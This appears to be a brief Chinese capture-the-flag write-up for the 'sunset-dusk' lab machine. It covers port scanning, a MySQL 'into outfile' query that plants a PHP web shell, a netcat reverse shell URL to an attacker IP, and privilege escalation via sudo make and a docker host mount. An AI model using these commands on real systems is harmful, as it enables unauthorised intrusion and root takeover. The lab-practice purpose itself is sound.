靶机链接: https://www./entry/sunset-dusk,404/ 主机IP扫描:
IP端口扫描:
21 端口 pyftpdlib 1.5.5 版本漏洞 25 端口 Postfix 账户枚举 80 Apache httpd 2.4.38 版本漏洞,目录枚举 3306 mysql MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1 版本漏洞,暴力破解 8080 http PHP cli server 5.5 版本漏洞,目录枚举 80 HTTP目录枚举,无结果 MySQL爆破结果
尝试用MySQL into outfile 写一句话木马 select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/pentest.php';
反向shell http://10.10.203.20:8080/pentest.php?cmd=nc%20-e%20/bin/bash%2010.10.203.14%201234
提权操作 COMMAND='/bin/sh' sudo -u dusk make -s --eval=$'x:\n\t-'"$COMMAND"
docker run -v /:/hostOS -i -t chrisfosterelli/rootplease
OVER!! |
|